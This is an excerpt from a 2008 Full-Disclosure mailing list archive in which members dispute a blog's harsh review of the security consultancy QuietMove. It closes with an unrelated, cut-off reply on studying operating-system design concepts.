>> people was Andre Gironda who had a lot of great things to say abou 
>> t QuietMove, but also made the unfortunate mistake of tainting his 
>>  credibility as a professional by directly attacking other vendors.
>>
>> Andre Gironda asked us who we are in one of his emails. He also  
>> indirectly accused us of exacting vengeance on QuietMove by  
>> performing a review. While we?ve never been accused of this before 
>>  by any of our other review subjects, we feel that we should state 
>>  for the record that this is not some sort of vengeance play.
>>
>> Andre Gironda also said that he can vouch for Adam?s 14 years of e 
>> xperience ?and then some?. Apparently when Andre met Adam of  
>> QuietMove, Adam was working as a Unix Security Administrator for U 
>> nphamiliar. Territories (UPT), ?a vulnerability research BBS that  
>> ran from 1989 ? 1996. Also according to Andre Gironda ?. It was  
>> a prominent place for information about vulnerability research. Ma 
>> ny held it in higher regard than Phrack magazine or any leading we 
>> bsite/magazine during that time period.?
>>
>> Sorry Andre, but we don?t agree with your statement about UPT. Eve 
>> n more importantly, we?re not sure how Adam?s experience as a  
>> Unix Security administrator (aka systems admin) will help him offe 
>> r professional IT Security Services. Adam needs to be able to prot 
>> ect his clients from real world hackers, not from failed tape back 
>> ups and disk crashes.
>>
>> Andre went on to say that many ?small businesses such as QuietMove 
>>  have a hard enough time staying alive in this industry.? He said  
>> ?I suggest you pick on someone your
>> own size even if you have a legitimate problem with QuietMove or  
>> Adam.? Our response is that we have no problem with Adam or QuietM 
>> ove. We found QuietMove by doing a google search for Penetration T 
>> esting.
>>
>> In a Different email Andre lost all credibility with us because he  
>> decided to directly attack other companies that we?ve reviewed tha 
>> t received higher grades. If you compare the score cards between Q 
>> uietMove and the other company that Andre bashes, you?ll see why t 
>> hey got the good grade. Anyway, here?s what Andre had to say  
>> (we?ll comment later):
>>
>> ?Look, you rated Denim Group as A-. You must either work there - or
>> know the guys. Dan Cornell is a moron compared to Adam Muntner - and
>> his code is certainly worse (e.g. Sprajax).
>>
>> Adam and team know Burp Suite, use manual web application testing -  
>> in
>> addition to traditional dynamic and static analysis.
>>
>> I have seen Adam and crew using Fortify Software's SCA and Tracer
>> tools. I have seen them using Hailstorm ARC and modifying the
>> Javascript included in the SmartAttack library. I would call this a
>> best-of-breed security testing methodology.
>>
>> I have worked for many small companies myself who do not use ANY
>> automated testing, including both open-source and commercial tools. I
>> think this is stupid... and spent most of my time writing `for' loops
>> in shell just to get around their limitation on "not writing scripts
>> to automate things".
>>
>> I have also worked for small companies that "only" use scripting
>> languages, or only use "the best" scripting language (usually Ruby,
>> Python, or Perl) and write all their own automated tools. This is
>> also stupid -- especially when existing toolsets have lots of great
>> capability -- it's like re-inventing the wheel.
>>
>> Of course there are places that "only use" commercial automated  
>> tools,
>> but I haven't actually met one yet. When I do -- I'll go ahead and
>> post an obnoxious review about them. More people will read mine than
>> anything you do -- and with my name on it -- they are certainly bound
>> to take it a lot more seriously.?
>>
>> Andre lost all credibility with our team when he insulted the Denim  
>> Group. We contacted the Denim Group and spoke directly with one of  
>> their founders when we did their review. Not only were we very  
>> impressed with them, but they provided us with great detail about  
>> their testing methodologies and service capabilities. Adam, Andre  
>> and the rest of the QuietMove team haven?t provided us with anythi 
>> ng tangible yet, and we?ve asked. When we tried to contact them th 
>> e first time we couldn?t get hold of them, same for the second.
>>
>> We?re still waiting to hear back from Adam at QuietMove with answe 
>> rs to our questions about the QuietMove services. If we hear back, 
>>  we?ll modify this blog entry yet again to properly reflect what w 
>> e feel is the truth. We?d also like to make the professional sugge 
>> stion that QuietMove think about their professional image before t 
>> hey respond to anyone in public forum. Not only does their reactio 
>> n not look good but it could make prospective customers turn away.
>>
>> Lastly, with respect to our comment about Marcin Wielgoszewski, a  
>> QuietMove consultant being ?Green?, he confirmed that for us in  
>> an email. He wrote ?You're right. I'm new and young and I'll be th 
>> e first to admit it. We can't all be born security gurus, and I'm  
>> not trying to hide that, but me aside... what have you done beside 
>> s hide behind your gmail account
>> and troll FD? Thanks for pointing out those two pages, two pages  
>> out of 100's that
>> were posted a long time ago and yes, are very out of date.?
>>
>> All in all it is our professional opinion is still that QuietMove  
>> doesn?t have significant ?strong? human talent behind their  
>> services. They appear to be a very small company run by someone th 
>> at is not a ?hacker? by nature but instead is a systems  
>> administrator or your advanced IT guy with a good understanding of 
>>  Web Application Security. If you are looking to truly defend your 
>> selves against malicious hackers then we suggest finding a differe 
>> nt provider.
>>
>> Note: If we receive any information back from QuietMove, other than  
>> what we?ve received in emotional reactions, then we?ll consider  
>> adding that information to this review. If QuietMove can provide u 
>> s with proof of capability then we will accurately reflect that ca 
>> pability here. We?re not in the business of bashing anyone even if 
>>  they bash us or disrespect us. We are in the business of exposing 
>>  Professional IT Security Service providers for what they really a 
>> re to the best of our ability.
>>
>> If you feel that QuietMove deserves a better grade and can provide  
>> us with legitimate reasons as to why, then please comment and we?l 
>> l consider it. (Even after all of their insults.)
>>
>> Score Card (Click to Enlarge)
>>
>>
>>
>> --
>> Posted By secreview to Professional IT Security Providers - Exposed  
>> at 1/01/2008 10:38:00 PM
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/27d7c138/attachment.html 

From slash.pd at gmail.com  Wed Jan  2 15:08:56 2008
From: slash.pd at gmail.com (Peter Dawson)
Date: Wed, 2 Jan 2008 10:08:56 -0500
Subject: [Full-disclosure] Fwd:  Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
	<616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>
	<8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
Message-ID: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>

Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link
you could share ?
tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner < adam.muntner at quietmove.com> wrote:

>
>
> Dre thx for pointing out the ha.ckers.org posts. More evidence of
> secreview selective quotation and/or ability to 'research'
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/aa0a0133/attachment.html 

From adam.muntner at quietmove.com  Wed Jan  2 15:26:17 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 10:26:17 -0500
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
	<616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>
	<8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
	<8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
Message-ID: <CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>

It was a reply to the larry suto review of web app scanners rsnake  
posted. I commented on his blog post. The review was totally worthless.

Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <slash.pd at gmail.com> wrote:

>
> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there  
> a link you could share ?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner < adam.muntner at quietmove.com>  
> wrote:
>
>
> Dre thx for pointing out the ha.ckers.org posts. More evidence of  
> secreview selective quotation and/or ability to 'research'
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/7f209373/attachment.html 

From mukul.dharwadkar at gmail.com  Wed Jan  2 15:41:42 2008
From: mukul.dharwadkar at gmail.com (Mukul Dharwadkar)
Date: Wed, 2 Jan 2008 09:41:42 -0600
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
	<616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>
	<8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
	<8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
	<CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>
Message-ID: <a7e4fdbc0801020741p5397d984m19dc5cc094c3c064@mail.gmail.com>

With all due respect Adam,

You would not have responded to these posts at all if you thought these
reviews were worthless.


On 1/2/08, Adam Muntner <adam.muntner at quietmove.com> wrote:
>
>  It was a reply to the larry suto review of web app scanners rsnake
> posted. I commented on his blog post. The review was totally worthless.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> Phone: 602-793-5969
> Fax: 866-272-8194
> http://www.quietmove.com
>
>
> Sent from my iPhone
>
> On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <slash.pd at gmail.com> wrote:
>
>
>
>
> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there a link
> you could share ?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner < adam.muntner at quietmove.com> wrote:
>
> >
> >
> >
> > Dre thx for pointing out the ha.ckers.org posts. More evidence of
> > secreview selective quotation and/or ability to 'research'
> >
> >
> >
>
>
>
>
>  _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Smile!!! :) It improves your face value...

Visit me at
http://www.dharwadkar.com
http://www.dharwadkar.org
Sister Site:
http://www.saraswatibhuvan.org
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/755cc414/attachment.html 

From secreview at hushmail.com  Wed Jan  2 18:08:13 2008
From: secreview at hushmail.com (SecReview)
Date: Wed, 02 Jan 2008 13:08:13 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
Message-ID: <20080102180813.C5B5050038@mailserver9.hushmail.com>

Hi Adam, 
   
We've said this before and will say this again, this time to 
everyone. 

We would be more than happy to give your company (QuietMove) a 
"better" review if you'd enable us to do that. So far you haven't 
helped us to effectively review you at all. We tried to call you 
before our initial review, but never got hold of anyone. We also 
sent you an email before writing our second review, and you never 
responded to any of the questions in that email. If you'd like us 
to do a better review then provide us with the information that you 
think we will need to get the job done. 

Our current review is the product of your website, emails that 
you've posted to this and other forums, and your reaction to our 
first review. We haven't been able to find anything related to 
major accomplishments by you or by QuietMove, we haven't seen any 
sample reports, and we haven't received any answers to any 
questions about your methodologies for service execution and 
delivery. We even think that our current review might be too harsh, 
but can't change anything without more information. 

If you want us to change our review, we can do that again and we 
can do it in a non-biased way (regardless of all the rants and 
noise). We need you to tell us about your service delivery 
methodologies, your reporting methodologies, how you define 
specific service offerings, what markets you play in, and if 
possible sanitized sample reports. We won't publish any of that 
information directly, but we would use that to produce your next 
review. 

We want our reviews to accurately and truthfully reflect the 
quality and professionalism of the providers that we study. (In 
fact, if anyone has any suggestions as to how we could better 
"rank" security companies we'd be more than happy to listen and 
consider those suggestions.) 

Hope this helps. This will be our last email about QuietMove unless 
you request a redo of the current review. We will only redo the 
review if you are able to provide us with accurate information to 
help us get it done. We think that you should do it, because we 
think that you can score much better than an F+. (You're clearly 
not an idiot and you do have at least some experience.)

-the end.




Regards, 
      The Secreview Team
      http://secreview.blogspot.com

--
Add warmth and beauty to your home with a new rug.  Click Now.
http://tagline.hushmail.com/fc/Ioyw6h4edu6i9KyFqhMMxsbZ4PNyvCU2wW5JQxc2h8yrTHE4BofBeo/
      Professional IT Security Service Providers - Exposed



From Valdis.Kletnieks at vt.edu  Wed Jan  2 18:39:21 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 13:39:21 -0500
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: Your message of "Tue, 01 Jan 2008 12:33:36 CST."
	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
Message-ID: <22264.1199299161@turing-police.cc.vt.edu>

On Tue, 01 Jan 2008 12:33:36 CST, reepex said:

> Is this list up to date?  It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C?

C is not a prerequisite for understanding operating systems design. It's only
needed if the particular operating system you're working with implements its
internals in C.

What is more important is understanding the *concepts* - things like locking,
and race conditions, and how fine-grained locking you need/want for a
filesystem. Having one big lock is a lot easier, but causes contention - having
a lot of little locks can cause deadlocks, especially in error handlers.  What
does the filesystem code do if (for example) it gets 2/3 of the way through the
rename of a file, and encounters an I/O error while writing out the removal of
the old name of the file?  What are the trade-offs required for an operating
system to support jitter-free multimedia applications (the first thing to learn
is that throughput, latency, and jitter are intertwined, and it's very
difficult to do all 3 well at the same time)?

It's also important to understand that there are approaches other than Windows
and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and
have a lot to tell us about other choices that can be made.  There's still a
lot of VMS running out there in scattered corners as well - and that system had
a lot of concepts that one should understand, at least well enough to know why
"my favorite system didn't do it that way because..." (Hint - consider how and
why SYS$FOO variables worked in VMS, and why they're so hard to get working
correctly under Linux - they're *not* exactly the same as Un